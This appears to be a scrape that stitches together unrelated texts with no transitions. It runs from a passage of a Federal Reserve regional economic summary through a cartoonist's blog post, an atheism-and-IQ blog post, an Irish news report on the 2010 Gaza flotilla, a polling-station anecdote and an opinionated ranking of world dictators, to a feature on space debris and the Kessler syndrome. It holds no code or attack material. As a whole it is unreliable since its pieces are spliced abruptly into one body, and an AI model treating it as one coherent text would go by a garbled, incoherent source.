Commercial and industrial lending by banks remained weak in most Districts , although Philadelphia , Chicago , Dallas , and San Francisco noted business loan demand was firming .
Philadelphia also indicated an increase in business lending by non-depository financial companies , and New York reported that underwriting and investment banking activity strengthened .
Consumer lending weakened in most Districts .
In contrast , real estate lending increased even though standards on these loans remained tighter than on other loans , particularly for commercial mortgages .
Chicago noted that the secondary market for residential mortgages was beginning to improve , and private equity investment in commercial properties increased in Boston , Chicago , and Dallas .
Loan quality was indicated to be stabilizing or gradually improving in most Districts , but remained an issue for banks with large exposures to real estate .
Contacts in some Districts cited concerns over the potential impact of the European fiscal crisis on financial and business conditions , and reported a corresponding increase in uncertainty and financial market volatility .
Agriculture and Natural Resources
Crop planting was generally ahead of the seasonal norm , particularly in the Chicago , Minneapolis , and Dallas Districts , although soybean planting was lagging in St. Louis and Kansas City .
Crop emergence was also ahead of the typical pace .
Precipitation conditions were generally positive , with the exception of flooding in Tennessee and dryness in parts of the Richmond and Dallas Districts .
Prices for hogs , cattle , and cotton were higher , while prices for grains , soybeans , and milk were roughly unchanged .
Mining and energy industry activity varied across Districts .
According to contacts in the Atlanta District , the Gulf oil spill had little immediate effect on oil production , although it had damaged fishing operations .
Employment , Wages , and Prices
Labor market conditions improved slightly with permanent employment levels edging up in most Districts .
In addition , many Districts again noted an increase in temporary hires , with Boston and Dallas also indicating a pick up in temporary - to - permanent transitions .
By industry , manufacturing was the most often cited source of employment gains ( both temporary and permanent ) , and Cleveland , Minneapolis , and Dallas noted an increase in the manufacturing workweek .
Other sources of increased employment were the biopharmaceutical industry in Boston , retail trade in Chicago , and transportation in Dallas .
Wage pressures were limited , although San Francisco noted upward pressure on employee benefit costs .
Prices of final goods and services were largely unchanged in most Districts as higher input costs were not being passed along to customers and wage pressures continued to be minimal .
Steel prices in many Districts moved higher , as did lumber and food prices , while energy prices generally declined .
Several Districts noted tighter commodity supply conditions , with Richmond and Kansas City indicating an increase in supplier lead times and Boston and Atlanta reporting supply chain capacity constraints .
Transportation costs moved up in the Philadelphia , Richmond , Atlanta , and San Francisco Districts , but diesel fuel cost pressures eased in New York .
Return to top Boston
Big day .
It ’s our Christmas , and I ’m out playing Santa in downtown Toronto at Paradise Comics .
Come visit !
And now , with just a little further ado , we bring you the Saturday Morning Comics .
–
—
Oh , those silly space rogues , what will they get into next week ?
I wish the hell I knew– who has time to write that far in advance ?
( read the previous chapters here )
In the meantime , here ’s —
COMIC ARCHEOLOGY 101
This blog was originally set up to scan and sort out all the original art and old unprinted things I ’d done in the eleven decades I ’ve been in the biz ( starting as a ghost inker on “ THE YELLOW KID ” ) .
In my most recent bout of going through “ THE PILE ” , I came across some comic strips that I ’d done for my high school paper … in COLOUR !
( I have no recollection of a colour edition of our high school paper , but I remember things about as well as that Dorrie the fish character from …. you know … that movie with the fish– so anything is possible . )
But I scanned ’em , and now you get to laugh at them ( for all the wrong reasons at this point ) and see where it all began …with no apparent talent whatsoever .
Oh , yes , I was a little influenced by Doonesbury back then .
I was sixteen , and at that age , one ’s instinct is to directly steal someone else ’s style and skills .
It ’s why teen girls love vampire stories –ALL teenagers are vampires in some way , the little shits .
And now , after so much ado , I present , the crappy work of a 16 year old Ty .
–
I ’m getting all nostalgic for a time when people sat in bars without open carry weapons .
Here ’s another one from the days when TV was a broadcast medium .
I might put up more of these cave paintings next week , unless someone stops me with an injunction .
You ’ve been warned .
–
That ’s it for today .
See you back here next week when I figure out a way to have Stavros and Lana escape from certain death , or I ignore it completely and start a new adventure on Venus .
It depends on how much spare time I have to write a GOOD script .
And do n’t forget to visit me at PARADISE COMICS today for a free comic book , a free sketch , a free smile and a free curse in VODON - ESE .
Ty the Guy .
Share :
Recent posts have proposed convoluted theories accounting for why atheists score higher on IQ tests than religious people .
There is a much simpler explanation .
Like a lot of correlations of this type , it is probably less exciting than it appears .
Atheists are probably more intelligent than religious people because they benefit from many social conditions that happen to be correlated with loss of religious belief .
When one looks at this phenomenon from the point of view of comparisons between countries , it is not hard to figure out possible reasons that more intelligent countries have more atheists as Richard Lynn ( 2009 ) reported .
Here are some .
Highly religious countries ( Barber , 2012 ) :
Are poorer .
They are less urbanized .
Have lower levels of .
They have less exposure to electronic media that increase ( Barber , 2006 ) .
Experience a heavier load of infectious diseases that impair brain function .
Suffer more from low birth weights .
Have worse child .
Do a poor job of controlling environmental pollutants such as lead that reduce IQ .
Given that each of these factors are recognized causes of low IQ scores ( Barber 2005 ) , there is little mystery about why religious countries score lower on IQ tests .
Of course , the same phenomena are relevant to comparisons within a country , although within - country differences in these factors are generally smaller .
Even so , the wealthier individuals in a country experience life differently than the poorer ones , developing higher IQ scores and greater religious skepticism .
As to the more exciting explanations , I doubt that religion causes stupidity if only because some of the most brilliant people of history , such as Isaac Newton , were highly religious like most of their contemporaries .
Whether intelligence causes people to reject religious belief is more complex .
It is certainly plausible that highly intelligent people would have a problem accepting some of the more improbable beliefs required by their church Moreover , modern science offers explanations for phenomena that were previously explained in terms of religion and intelligent people may prefer the scientific account ..
In short , discussing correlations between IQ and without a grasp of the relevant underlying factors is something of a parlor game .
It recalls the long and tiresome debate about the correlation between IQ scores and skin color that got a lot of people very excited but proved a scientific dead end .
The really interesting question buried in all of this is why atheism is sparked uniquely by contemporary conditions in developed countries .
I will return to this in a future post
References :
Barber , N. ( 2005 ) .
Educational and ecological correlates of IQ : A cross-national investigation .
Intelligence , 33 , 273-284 .
Barber , N. ( 2006 ) .
Is the effect of national wealth on academic achievement mediated by mass media and computers ?
Cross-Cultural Research , 40 , 130 - 151 .
Barber , N. ( 2012 ) .
Why atheism will replace religion :
The triumph of earthly pleasures over pie in the sky .
E-book , available at : http://www.amazon.com/Atheism-Will-Replace-Religion-ebook/dp/B00886ZSJ6/
Lynn , R. , Harvey , J. , & Nyborg , H. ( 2009 ) .
Intelligence predicts atheism across 137 nations .
Intelligence , 37 , 11 - 15 .
The Israeli prime minister has accused international critics of ' hypocrisy ' over his government 's handling of the Gaza humanitarian flotilla .
Benjamin Netanyahu defended Monday 's seizure of a Turkish aid ship bound for Gaza , in which nine activists aboard were killed .
In a televised address to the nation , he said he would continue to enforce the blockade of Gaza .
He said to lift the embargo would turn it into a base for Iranian missiles that would threaten both Israel and Europe .
Earlier , Taoiseach Brian Cowen urged the Israeli government to exercise absolute restraint in dealing with the MV Rachel Corrie .
The Irish - owned ship , which is carrying humanitarian aid , is continuing its journey towards Gaza despite the Israeli blockade of the territory .
There are 15 people on board the vessel , including five Irish citizens .
It expects to reach the Gaza coastline by Friday afternoon .
Mr Cowen told the Dáil that the Government has been maintaining close contact with the ship .
He added that the presence of cement on board may be problematic .
Israel deports activists
The Israeli Government has begun deporting hundreds of foreign activists detained after it stormed the flotilla carrying aid for Gaza in international waters .
The Department of Foreign Affairs has said that a plane carrying detainees has landed in Ankara in Turkey .
A man who holds dual Irish / Libyan citizenship was on board the plane .
Another four Irish citizens are on a plane heading for Istanbul .
The Department believes that another Irish citizen is still in Ben Gurion Airport in Tel Aviv .
An Irish embassy official has been deployed to Istanbul airport to provide any assistance necessary to the Irish deportees when they arrive .
Ambassador withdraws from Oireachtas meeting
Meanwhile , Israel 's Ambassador to Ireland Dr Zion Evrony has withdrawn from a meeting of the Oireachtas Foreign Affairs Committee , which was scheduled to take place tomorrow .
The Israeli embassy said Dr Evrony withdrew due to ' unforeseen circumstances ' .
Committee Chairman Dr Michael
Woods said : ' This eleventh hour volta face by the Ambassador is a most disappointing development .
' The Committee had been anxious to seek answers from him regarding his Government 's actions against vessels in international waters carrying humanitarian supplies for the people of Gaza . '
The Turkish cabinet held a special meeting with security and intelligence chiefs to discuss relations with Israel after the assault .
Four of the nine people killed during the incident were Turkish .
The Israeli Foreign Ministry has reportedly ordered non-essential staff from its diplomatic mission in Turkey to leave the country .
British Prime Minister David Cameron has described the events of Monday as ' completely unacceptable ' .
He said he had spoken to Turkey 's Prime Minister Recep Tayyip Erdogan to offer his condolences for the deaths of Turkish nationals .
Shane Dillon returns to Ireland
Last night , Shane Dillon ( left ) , the first of the Irish deportees who was travelling on the flotilla , arrived back in Dublin Airport on a flight from Frankfurt .
He said the Israeli military landing parties had treated those on board the vessels badly .
Describing the dramatic moments the Challenger 1 came under attack , Mr Dillon said the ship was surrounded by blacked - out vessels and helicopters before armed forces launched an assault at close range with stun guns and high - powered paintball pellets .
' I would n't call them soldiers , they are terrorists , ' said the 36 - year - old .
' They attacked us in international waters .
That was a pure act of piracy in international waters on a peace fleet . '
He angrily denied accusations that activists had weapons on board the ships .
' The weapons the Israelis displayed were cooking knives , a hammer .
This was a big merchant ship , of course it 's going to have a hammer , of course it 's going to have galley knives , ' he said .
He said that , despite a wound to his left arm from a Taser , he was treated better than most activists because he was a member of the crew .
' There was one girl , she was only young , a Belgian girl , she had a broken nose , ' he continued .
' One of the leaders from the Free Gaza Organisation , he was beaten on the deck of the ship .
' They smashed our stern door which is glass and they beat some of the girls and pushed them around the deck .
They were n't friendly with them at all . '
Mr Dillon said he only was freed to leave Israel once he signed deportation papers .
' They asked me to sign and I signed numerous things , I signed Shane the Pain and Mickey Mouse , ' he added .
' They did n't really understand .
They gave it to me in Hebrew and I said , ' Well , I do n't understand that ' and they gave it to me in English and I said ' Ní thuigim é sin ' .
( A young girl of 18 or 19 , clearly a first - time voter , skips the line and rushes up to my table . )
Me : “ I ’m sorry , you ’ll have to wait .
There ’s a line . ”
Voter : “ I ’m sorry , but it ’s important !
I need to get my ballot paper back .
I voted for the wrong person ! ”
Me : “ All right , give me the spoiled one . ”
Voter : “ I can ’t .
I put it in the box . ”
Me : “ Then I ’m afraid we ca n’t get it back .
The boxes ca n’t be opened until the end of voting at ten o’clock . ”
Voter : “ But I did n’t know !
I do n’t want the Conservatives to get in so I voted for [ Conservative Candidate ] .
I should have voted for someone else ! ”
Me : “ Um , why did you vote for the Conservative ? ”
( The girl turns scarlet and looks utterly miserable . )
Voter : “ I thought it was like TV where you vote them off ! ”
The Worst of the Worst
A continent away from Kyrgyzstan , Africans like myself cheered this spring as a coalition of opposition groups ousted the country ’s dictator , President Kurmanbek Bakiyev .
“ One coconut down , 39 more to harvest ! ” we shouted .
There are at least 40 dictators around the world today , and approximately 1.9 billion people live under the grip of the 23 autocrats on this list alone .
There are plenty of coconuts to go around .
The cost of all that despotism has been stultifying .
Millions of lives have been lost , economies have collapsed , and whole states have failed under brutal repression .
And what has made it worse is that the world is in denial .
The end of the Cold War was also supposed to be the “ End of History ” — when democracy swept the world and repression went the way of the dinosaurs .
Instead , Freedom
House reports that only 60 percent of the world ’s countries are democratic — far more than the 28 percent in 1950 , but still not much more than a majority .
And many of those are n’t real democracies at all , ruled instead by despots in disguise while the world takes their freedom for granted .
As for the rest , they ’re just left to languish .
Although all dictators are bad in their own way , there ’s one insidious aspect of despotism that is most infuriating and galling to me : the disturbing frequency with which many despots , as in Kyrgyzstan , began their careers as erstwhile “ freedom fighters ” who were supposed to have liberated their people .
Back in 2005 , Bakiyev rode the crest of the so - called Tulip Revolution to oust the previous dictator .
So familiar are Africans with this phenomenon that we have another saying : “ We struggle very hard to remove one cockroach from power , and the next rat comes to do the same thing .
Haba ! ” Darn !
I call these revolutionaries - turned - tyrants “ crocodile liberators , ” joining the ranks of other fine specimens : the Swiss bank socialists who force the people to pay for economic losses while stashing personal gains abroad , the quack revolutionaries who betray the ideals that brought them to power , and the briefcase bandits who simply pillage and steal .
Here ’s my list of the world ’s worst dictators .
I have ranked them based on ignoble qualities of perfidy , cultural betrayal , and economic devastation .
If this account of their evils makes you cringe , just imagine living under their rule .
Photo Composite by Wind Up Digital
1. KIM JONG IL of North Korea : A personality - cult - cultivating isolationist with a taste for fine French cognac , Kim has pauperized his people , allowed famine to run rampant , and thrown hundreds of thousands in prison camps ( where as many as 200,000 languish today ) — all while spending his country ’s precious few resources on a nuclear program .
Years in power : 16
KNS / AFP / Getty Images
2. ROBERT MUGABE of Zimbabwe : A liberation “ hero ” in the struggle for independence who has since transformed himself into a murderous despot , Mugabe has arrested and tortured the opposition , squeezed his economy into astounding negative growth and billion - percent inflation , and funneled off a juicy cut for himself using currency manipulation and offshore accounts .
Years in power : 30
DESMOND KWANDE /AFP / Getty Images
3. THAN SHWE of Burma : A heartless military coconut head whose sole consuming preoccupation is power , Shwe has decimated the opposition with arrests and detentions , denied humanitarian aid to his people after 2008 ’s devastating Cyclone Nargis , and thrived off a black market economy of natural gas exports .
This vainglorious general bubbling with swagger sports a uniform festooned with self - awarded medals , but he is too cowardly to face an honest ballot box .
Years in power : 18
CHRISTOPHE ARCHAMBAULT /AFP / Getty Images
4. OMAR HASSAN AL - BASHIR of Sudan : A megalomaniac zealot who has quashed all opposition , Bashir is responsible for the deaths of millions of Sudanese and has been indicted by the International Criminal Court for war crimes .
Bashir ’s Arab militias , the janjaweed , may have halted their massacres in Darfur , but they continue to traffic black Sudanese as slaves ( Bashir himself has been accused of having had several at one point ) .
Years in power : 21
ASHRAF SHAZLY / AFP / Getty Images
5. GURBANGULY BERDIMUHAMEDOV of Turkmenistan : Succeeding the eccentric tyrant Saparmurat Niyazov ( who even renamed the months of the year after himself and his family ) , this obscure dentist has kept on keeping on with his late predecessor ’s repressive policies , explaining that , after all , he bears an “ uncanny resemblance to Niyazov . ”
Years in power : 4
DIMITAR DILKOFF /AFP / Getty Images
6. ISAIAS AFWERKI of Eritrea : A crocodile liberator , Afwerki has turned his country into a national prison in which independent media are shut down , elections are categorically rejected , indefinite military service is mandatory , and the government would rather support Somali militants than its own people .
Years in power : 17
GERARD CERLES / AFP / Getty Images
7. ISLAM KARIMOV of Uzbekistan : A ruthless thug ruling since Soviet times , Karimov has banned opposition parties , tossed as many as 6,500 political prisoners into jail , and labels anyone who challenges him an “ Islamic terrorist . ”
What does he do with “ terrorists ” once they are in his hands ?
Torture them : Karimov ’s regime earned notoriety for boiling two people alive and torturing many others .
Outside the prisons , the president ’s troops are equally indiscriminate , massacring hundreds of peaceful demonstrators in 2005 after a minor uprising in the city of Andijan .
Years in power : 20
STRINGER / AFP / Getty Images
8. MAHMOUD AHMADINEJAD of Iran : Inflammatory , obstinate , and a traitor to the liberation philosophy of the Islamic Revolution , Ahmadinejad has pursued a nuclear program in defiance of international law and the West .
Responsible for countless injustices during his five years in power , the president ’s latest egregious offense was leading his paramilitary goons , the Basij , to violently repress protesters after June 2009 ’s disputed presidential election , which many believe he firmly lost .
Years in power : 5
ATTA KENARE / AFP / Getty Images
9. MELES ZENAWI of Ethiopia : Worse than the former Marxist dictator he ousted nearly two decades ago , Zenawi has clamped down on the opposition , stifled all dissent , and rigged elections .
Like a true Marxist revolutionary , Zenawi has stashed millions in foreign banks and acquired mansions in Maryland and London in his wife ’s name , according to the opposition — even as his barbaric regime collects a whopping $ 1 billion in foreign aid each year .
Years in power : 19
TONY KARUMBA / AFP / Getty Images
10 . HU JINTAO of China : A chameleon despot who beguiles foreign investors with a smile and a bow , but ferociously crushes political dissent with brutal abandon , Hu has an iron grip on Tibet and is now seeking what can only be described as new colonies in Africa from which to extract the natural resources his growing economy craves .
Years in power : 7
Jason Lee-Pool / Getty Images
11 . MUAMMAR AL - QADDAFI of Libya :
An eccentric egoist infamous for his indecipherably flamboyant speeches and equally erratic politics , Qaddafi runs a police state based on his version of Mao ’s Red Book — the Green Book — which includes a solution to “ the Problem of Democracy . ”
Repressive at home , Qaddafi masquerades as Africa ’s king of kings abroad ( the African Union had to politely insist that he step down as its rotating head ) .
Years in power : 41
AFP / GETTY IMAGES
12 . BASHAR AL - ASSAD of Syria :
A pretentious despot trying to fit into his father ’s shoes ( they ’re too big for him ) , Assad has squandered billions on foreign misadventures in such places as Lebanon and Iraq while neglecting the needs of the Syrian people .
His extensive security apparatus ensures that the population does n’t complain .
Years in power : 10
BULENT KILIC / AFP / Getty Images
13 . IDRISS DÉBY of Chad : Having led a rebel insurgency against a former dictator , Déby today faces a similar challenge — from one of his own former cabinet officials , among others .
To repel would - be coup leaders , Déby has drained social spending accounts to equip the military , co-opted opposition - leader foes , and is now building a moat around the capital , N’Djamena .
Years in power : 20
PASCAL GUYOT / AFP / Getty Images
14 . TEODORO OBIANG NGUEMA MBASOGO of Equatorial Guinea : Obiang and his family literally own the economy , having reportedly amassed a fortune exceeding $ 600 million while the masses are left in desperate poverty .
Equatorial Guinea ’s extraordinary oil wealth puts its GDP per capita on par with many European states — if only it were evenly shared .
Instead , revenues remain a “ state secret . ”
Years in power : 31
JEROME DELAY / AFP / Getty Images
15 . HOSNI MUBARAK of Egypt : A senile and paranoid autocrat whose sole preoccupation is self - perpetuation in office , Mubarak is suspicious of even his own shadow .
He keeps a 30 - year - old emergency law in place to squelch any opposition activity and has groomed his son , Gamal , to succeed him .
( No wonder only 23 percent of Egyptians bothered to vote in the 2005 presidential election . )
Years in power : 29
ATTILA KISBENEDEK /AFP / Getty Images
16 . YAHYA JAMMEH of Gambia :
This eccentric military buffoon has vowed to rule for 40 years and claims to have discovered the cure for HIV / AIDS .
( Jammeh also claims he has mystic powers and will turn Gambia into an oil - producing country ; no luck yet . )
A narcissist at heart , the dictator insists on being addressed as His Excellency Sheikh Professor Alhaji Dr. Yahya Abdul - Azziz Jemus Junkung Jammeh .
Years in power : 16
ISSOUF SANOGO / AFP / Getty Images
17 . HUGO CHÁVEZ of Venezuela :
The quack leader of the Bolivarian Revolution , Chávez promotes a doctrine of participatory democracy in which he is the sole participant , having jailed opposition leaders , extended term limits indefinitely , and closed independent media .
Years in power : 11
MIGUEL GUTIERREZ /AFP / Getty Images
18 . BLAISE COMPAORÉ of Burkina Faso :
A tin -pot despot with no vision and no agenda , save self - perpetuation in power by liquidating opponents and stifling dissent , Compaoré has lived up to the low standards of his own rise to power , after murdering his predecessor , Thomas Sankara , in a 1987 coup .
Years in power : 23
FETHI BELAID / AFP / Getty Images
19 . YOWERI MUSEVENI of Uganda : After leading a rebel insurgency that took over Uganda in 1986 , Museveni declared : “ No African head of state should be in power for more than 10 years . ”
But 24 years later , he is still here , winning one “ coconut election ” after another in which other political parties are technically legal but a political rally of more than a handful of people is not .
Years in power : 24
CHRIS JACKSON / Getty Images
20 . PAUL KAGAME of Rwanda : A liberator who saved the Tutsis from complete extermination in 1994 , Kagame now practices the same ethnic apartheid he sought to end .
His Rwandan Patriotic
Front dominates all levers of power : the security forces , the civil service , the judiciary , banks , universities , and state - owned corporations .
Those who challenge the president are accused of being a hatemonger or divisionist and arrested .
Years in power : 10
SHAUN CURRY / AFP / Getty Images
21 . RAÚL CASTRO of Cuba : Afflicted with intellectual astigmatism , the second brother Castro is pitifully unaware that the revolution he leads is obsolete , an abysmal failure , and totally irrelevant to the aspirations of the Cuban people .
He blames the failure of the revolution on foreign conspiracies — which he then uses to justify even more brutal clampdowns .
Years in power : 2
JOE RAEDLE / Getty Images
22 . ALEKSANDR LUKASHENKO of Belarus :
An autocrat and former collective farm chairman , Lukashenko maintains an iron grip on his country , monitoring opposition movements with a secret police distastefully called the KGB .
His brutal style of governance has earned him the title “ Europe ’s last dictator ” ; he even gave safe haven to Kyrgyzstan ’s toppled leader when that country rose up this spring .
Years in power : 16
AFP / Getty Images
23 . PAUL BIYA of Cameroon : A suave bandit who has reportedly amassed a personal fortune of more than $ 200 million and the mansions to go with it , Biya has co-opted the opposition into complete submission .
Not that he ’s worried about elections ; he has rigged the term limit laws twice to make sure the party does n’t end anytime soon .
Years in power : 28
NEXT : The Central Republic : A Literal Disaster
BERTRAND GUAY / AFP / Getty Images
On clear winter nights , when the trees are bare , Donald Kessler likes to set up a small telescope on the back deck of his house in Asheville , North Carolina , and zoom in on the stars shining over the Blue Ridge Mountains .
It ’s not the most advanced home observatory , but the retired NASA scientist treasures his Celestron telescope , which was made in 1978 .
That also happens to be the year Kessler published the paper that made his reputation in aerospace circles .
Assigned to the Environmental Effects Project Office at NASA ’s Johnson Space Center in Houston , the astrophysicist had gotten interested in the junk that humans were abandoning in the wild black yonder — everything from nuts and tools to defunct satellites and rocket stages the size of school buses .
In that seminal paper , “ Collision Frequency of Artificial Satellites : The Creation of a Debris Belt , ” Kessler painted a nightmare scenario : Spent satellites and other space trash would accumulate until crashes became inevitable .
Colliding objects would shatter into countless equally dangerous fragments , setting off a chain reaction of additional crashes .
“ The result would be an exponential increase in the number of objects with time , ” he wrote , “ creating a belt of debris around the Earth . ”
At age 38 , Kessler had found his calling .
Not that his bosses had encouraged him to look into the issue — ” they did n’t like what I was finding , ” he recalls .
But after the paper came out , NASA set up the Orbital Debris Program Office to study the problem and put Kessler in charge .
He spent the rest of his career tracking cosmic crap and forming alliances with counterparts in other nations in an effort to slow its proliferation .
His description of a runaway cascade of collisions — which he predicted would happen in 30 to 40 years — became known as the Kessler syndrome .
While the scenario was accepted in theory by NASA officials , nothing much was done about it .
Capturing and disposing of space junk would be expensive and difficult , and the threat was too far in the future to trigger much worry .
After Kessler retired in 1996 , he grew a trim gray beard , peered through his telescope on those clear nights , and waited .
“ I knew something would happen eventually , ” he says .
Then , on February 10 , 2009 — just a little more than three decades after the publication of his paper — the Kessler syndrome made its stunning debut .
Some 500 miles over the Siberian tundra , two satellites were cruising through space , each racing along at about 5 miles per second .
Iridium 33 was flying north , relaying phone conversations .
A long - retired Russian communication outpost called Cosmos 2251 was tumbling east in an uncontrolled orbit .
Then they collided .
The ferocious impact smashed the satellites into roughly 2,100 pieces .
Repercussions on the ground were minimal — perhaps a few dropped calls — but up in the sky , the consequences were serious .
The wreckage quickly expanded into a cloud of debris , each shard an orbiting cannonball capable of destroying yet another hunk of high - priced hardware .
As Kessler received reports of the collision from former colleagues at NASA , he realized that the situation had played out pretty much as he ’d foreseen .
After all , he had forecast that the first satellite collision would happen around this time between objects of roughly this mass .
Like an opening shot in a war , the crash served as a signal that the syndrome had gone from theory to reality .
“ Some people were n’t aware how fast these objects are going , ” he says .
“ At those speeds , even something quite small can create tremendous damage . ”
Almost immediately after the accident , a military unit called the Space Surveillance Network sprang into action .
Run by the Joint Space Operations Center at California ’s Vandenberg Air Force Base , the network uses a system of radar installations and optical sensors to monitor space junk .
Before the Iridium - Cosmos incident , it had been tracking 120 active satellites and worrying about an average of five potential collisions , or “ conjunctions , ” per day .
The crash took everyone by surprise .
“ It was n’t even on their list of possibilities that day , ” an Iridium spokesperson says .
The operations center moved quickly to double its computer capacity .
By early 2010 , it was keeping a close eye on 1,000 active satellites , 3,700 inactive satellites and rocket pieces , and another 15,300 objects the size of a fist or larger — a level of awareness that revealed a much higher daily average of 75 possible collisions .
And that ’s ignoring the danger posed by the estimated half - million smaller pieces of debris the size of a marble or larger .
Too small to track from the ground , each of those tiny projectiles is capable of severely damaging a satellite .
Just a month after the Iridium accident , a stray motor chunk hurtled toward the International Space Station .
Cruising at an altitude of 220 miles , astronauts aboard the $ 100 billion laboratory were going about their daily chores at around noon EDT when they received a warning — prepare for possible impact .
The crew was directed to scramble into the station ’s equivalent of a lifeboat , an attached Russian - made Soyuz capsule .
It would give them a chance to abandon ship , if necessary .
After a few minutes , the motor zipped by , missing the ISS by just a few miles — in space terms , a close call .
Then on December 1 , with almost no warning , a small chunk from a different Cosmos satellite hurtled toward the ISS , coming within a mile of a direct hit .
Due to its speeding - bullet velocity , even this fragment could have had an impact equal to a truck bomb .
“ A 10 - centimeter sphere of aluminum would be like 7 kilograms of TNT , ” says Jack Bacon , a senior NASA scientist charged with keeping the ISS safe .
“ It would blow everything to smithereens . ”
Incidents like these served as clear signs from above that something must finally be done about space junk .
Its proliferation threatens not only current and future space missions but also global communications — mobile phone networks , satellite television , radio broadcasts , weather tracking , and military surveillance , even the dashboard GPS devices that keep us from getting lost .
The number of manufactured objects cluttering the sky is now expected to double every few years as large objects weaken and split apart and new collisions create more Kesslerian debris , leading to yet more collisions .
NASA ’s Bacon puts it bluntly : “ The Kessler syndrome is in effect .
We ’re in a runaway environment , and we wo n’t be able to use space in the future if we do n’t start dealing with this now . ”
A Brief History of Space Junk
The Telstar 1 satellite relays the first phone calls and TV signals across the Atlantic .
It fails the next year .
It ’s still out there .
A Gemini 4 astronaut loses a glove on the first US spacewalk .
It burns up in the atmosphere a month later .
Skylab ’s reentry rattles windows and drops fragments onto the outback in western Australia .
The number of cataloged orbiting debris objects ( over 10 centimeters in diameter ) reaches nearly 6,500 .
A fuel tank from a Delta II rocket smashes into a yard near Georgetown , Texas .
Fortunately , no one is injured .
A titanium motor casing from a Delta II rocket crashes into the Saudi Arabian desert .
The number of cataloged debris objects in orbit tops 10,000 .
A Chinese test weapon shoots down the Fengyun - 1C satellite , creating some 3,000 new pieces of trackable space junk .
Pixar ’s Wall - E depicts a thick belt of space waste circling Earth .
The first satellite collision occurs .
Cosmos 2251 hits Iridium 33 , creating some 2,100 new pieces of debris .
An object headed toward the International Space Station forces the crew to prepare for an emergency escape .
The number of cataloged debris objects reaches 15,000 .
Photos : Wall - E : Pixar ; all others : NASA
Since the dawn of the space age , NASA has operated under what it calls the big sky theory — the notion that , given the vastness of space , it ’s perfectly fine to discard mission waste or abandoned rocket stages up there .
After all , these objects would likely fall out of orbit and burn up as they reentered Earth ’s atmosphere .
The only question was when .
Some would take just a few years , while those in higher orbits might not descend for decades .
“ We did n’t think twice about it , ” says former astronaut Bryan O’Connor , now one of NASA ’s top safety officers .
Russia and other nations have also been launching missions under the same assumption — that even if a giant solar panel happened to fall off the back of a shuttle , you could simply wish it bon voyage .
In the midst of all this complacency , Kessler was n’t the only voice raising concerns about the big sky theory .
Arthur C. Clarke , who in the 1940s conceived of communications satellites , wrote a 1979 novel , The Fountains of Paradise , in which all the space junk that had been accumulating “ had to be located , and somehow disposed of . ”
He imagined what he dubbed Operation Cleanup : Space fortresses armed with high - powered lasers would sweep the skies , vaporizing the debris .
If we did n’t act , Clarke warned , Earth would be cut off from space and we ’d lose the ability to communicate by satellite and explore the heavens .
“ We would sink back into a dark age , ” he wrote .
“ During the resultant chaos , disease and starvation would destroy much of the human race . ”
To stave off such a day , Kessler and his colleagues at the Orbital Debris Program Office developed some guidelines to slow the accumulation of space junk .
The rules limited what could be abandoned , and they required satellite operators to help clean up the crowded geosynchronous belt 22,400 miles above Earth by maneuvering retired spacecraft into slightly higher “ graveyard orbits ” out of harm ’s way .
By 2008 , similar guidelines had been adopted by most of the major space agencies around the world .
The new rules did slow the growth of space debris .
And thanks to gravity , stuff continued to fall from the sky .
Roughly once a day , an object in the official US catalog of debris drops out of orbit and turns to ash on reentry .
Once a week or so , an object that ’s too big or dense will survive reentry and plunge to Earth , but it typically plops down unnoticed in an ocean or some unpopulated expanse .
( There are exceptions :
An upper rocket stage once landed in the desert of Saudi Arabia , to the surprise of local shepherds , and in 1997 , a steel fuel tank slammed into a yard in Texas . )
Yet much of the progress from the international effort was undone in a single moment .
On January 11 , 2007 , the Chinese government staged a demonstration of its military might by firing a projectile at one of its own retired satellites , the Fengyun - 1C , in low Earth orbit .
The “ kinetic kill vehicle ” scored a bull ’s - eye , blasting the satellite into 3,000 trackable pieces .
( Even though its space program is relatively young , China already accounts for 31 percent of all debris traceable to specific launches — comparable to the shares of Russia and the US . )
It was n’t long before the Chinese test started causing trouble .
In May 2009 , a roughly 4 - inch fragment from the Fengyun explosion whizzed by space shuttle Atlantis , which at the time was in the vicinity of the Hubble Space Telescope on a repair mission .
Had it struck either one , it could have done catastrophic damage .
The Chinese debris , combined with the Iridium - Cosmos collision , finally revealed the bankruptcy of the prevailing philosophy governing space .
“ The big sky theory is no longer a viable concept for space operations , ” says Chris Moss , chief of strategy for the military ’s Joint Space Operations Center .
Officials at NASA now acknowledge that orbital debris is the biggest threat to the International Space Station .
And the call for action is global , says Heiner Klinkrad , the top debris expert at the European Space Agency : “ Debris removal is the only cure to the Kessler syndrome . ”
Last December , at a Marriott not far from Darpa ’s headquarters in Arlington , Virginia , about 175 people filed into a meeting hall to take part in the first - ever International Conference on Orbital Debris Removal , sponsored by Darpa and NASA .
The gathering attracted a group of idealistic innovators , members of a self - proclaimed “ debris community ” that no one knew existed in such numbers .
“ This reminds me of Boy Scouts , with their motto ‘ Leave no trace , ' ” said Patrick Moran , an engineer with California - based Aerospace Corporation .
“ The same rigor must now be imposed on space . ”
The three - day meeting featured an address by none other than Donald Kessler , the dean of space debris .
The official purpose of the conference was an open “ call for information , ” but in some respects it resembled an episode of American Idol , with rocket scientists as contestants — and with Kessler , his old NASA colleagues , and Darpa officials serving as judges .
Darpa had had only scant involvement with the debris issue , but the agency ’s director of tactical technology , David Neyland , kicked off the conference by noting that Darpa was created “ to look across different tech domains to prevent surprises , and orbital debris is a surprise ” — one with national security consequences for US spy satellites .
As in the early rounds of a talent contest , many of the acts did n’t seem quite ready for prime time .
A librarian from a university about 90 miles from Roswell , New Mexico , proposed launching giant sticky space balls that would adhere to objects and drag them out of orbit .
A grad student outlined his plan to attach sails to the space trash , gently floating the pieces earthward .
One engineer from Colorado insisted that a giant inflatable doughnut would do the trick by bouncing rubbish down into the atmosphere .
Then there were the inevitable laser - based approaches .
A former Los Alamos National Lab scientist presented a long - standing plan involving a giant laser station on a Hawaiian peak .
A professor from Alabama proposed zapping debris with lasers attached to satellites , causing the junk to plummet into the atmosphere .
But three of the plans seemed to hold real promise .
The first came from 72 - year - old Jerome Pearson , an engineer best known for imagining the space elevator concept in the 1970s .
Pearson showed up with an animated demo that looked remarkably like the old Space Invaders videogame .
Now president of South Carolina - based Star Technology and Research , he proposed a seven - year mission in which a dozen suitcase - sized spacecraft would piggyback on other launches .
Every vehicle would hold 100 lightweight nets , each as big as a house .
Onboard video cameras would allow ground crews to drape the nets over hunks of junk by remote control .
The craft would drag the debris out of orbit , then return to search for more .
Pearson claimed his system could capture 2,500 or so objects in the most crowded and dangerous bands of low Earth orbit .
The estimated price tag : $ 240 million .
